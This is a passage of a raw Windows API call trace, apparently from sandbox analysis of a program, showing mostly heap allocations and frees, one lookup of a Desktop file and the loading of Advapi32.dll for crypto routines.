RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0209.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0209.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0209.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53920 | out: hHeap=0x970000) returned 1 [0209.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0209.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b88 [0209.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54148 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0209.308] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0209.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0209.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0209.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b60 | out: hHeap=0x970000) returned 1 [0209.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0209.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0209.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0209.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0209.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0209.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0209.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0209.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0209.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0209.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0209.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0209.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0209.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0209.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0209.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0209.309] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0209.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0209.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0209.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0209.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0209.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0209.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0209.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0209.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0209.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0209.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0209.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0209.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0209.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0209.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0209.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0209.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0209.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0209.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0209.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0209.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0209.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0209.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0209.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0209.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0209.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0209.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0209.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0209.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0209.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0209.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0209.313] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0209.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0209.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0209.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0209.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0209.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0209.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0209.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54198 [0209.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0209.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0209.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0209.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0209.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0209.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0209.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0209.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0209.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0209.313] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0209.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0209.313] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0209.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0209.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0209.313] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0209.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0209.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0209.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0209.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0209.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0209.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0209.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0209.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0209.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0209.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0209.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0209.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0209.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0209.314] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0209.314] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0209.314] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/VstT.mp4", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2c3dc180, ftCreationTime.dwHighDateTime=0x1d5ecb8, ftLastAccessTime.dwLowDateTime=0x527ca840, ftLastAccessTime.dwHighDateTime=0x1d5eb2b, ftLastWriteTime.dwLowDateTime=0x527ca840, ftLastWriteTime.dwHighDateTime=0x1d5eb2b, nFileSizeHigh=0x0, nFileSizeLow=0x6d22, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="VstT.mp4", cAlternateFileName="")) returned 0xa876d0 [0209.314] FindClose (in: hFindFile=0xa876d0 | out: hFindFile=0xa876d0) returned 1 [0209.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0209.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0209.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53b18 | out: hHeap=0x970000) returned 1 [0209.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0209.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0209.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0209.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54238 | out: hHeap=0x970000) returned 1 [0209.315] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0209.315] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0209.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0209.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0209.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0209.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0209.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0209.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0209.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0209.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0209.315] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0209.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0209.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0209.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0209.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0209.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0209.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0209.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0209.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.316] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0209.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0209.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0209.316] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0209.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541e8 | out: hHeap=0x970000) returned 1 [0209.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0209.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0209.316] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0209.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc00 [0209.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0209.316] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0209.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc00 | out: hHeap=0x970000) returned 1 [0209.316] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0209.316] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50698 [0209.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0209.317] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0209.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0209.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c98 [0209.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c98 | out: hHeap=0x970000) returned 1 [0209.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0209.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0209.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0209.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0209.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699c8 [0209.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699c8 | out: hHeap=0x970000) returned 1 [0209.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0209.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0209.317] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0209.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0209.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0209.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0209.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0209.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0209.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0209.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0209.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0209.317] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0209.317] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0209.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0209.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0209.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0209.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0209.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0209.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0209.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0209.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0209.318] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0209.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0209.318] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0209.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0209.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0209.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0209.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0209.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0209.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0209.318] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0209.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0209.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.319] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c88 [0209.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c88 | out: hHeap=0x970000) returned 1 [0209.319] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0209.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0209.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0209.319] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0209.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0209.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0209.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54bf8 [0209.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0209.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0209.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0209.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0209.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0209.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0209.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0209.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0209.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0209.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0209.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0209.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0209.319] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.319] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c28 [0209.319] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c28 | out: hHeap=0x970000) returned 1 [0209.320] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b78 [0209.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b78 | out: hHeap=0x970000) returned 1 [0209.320] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0209.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0209.320] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: 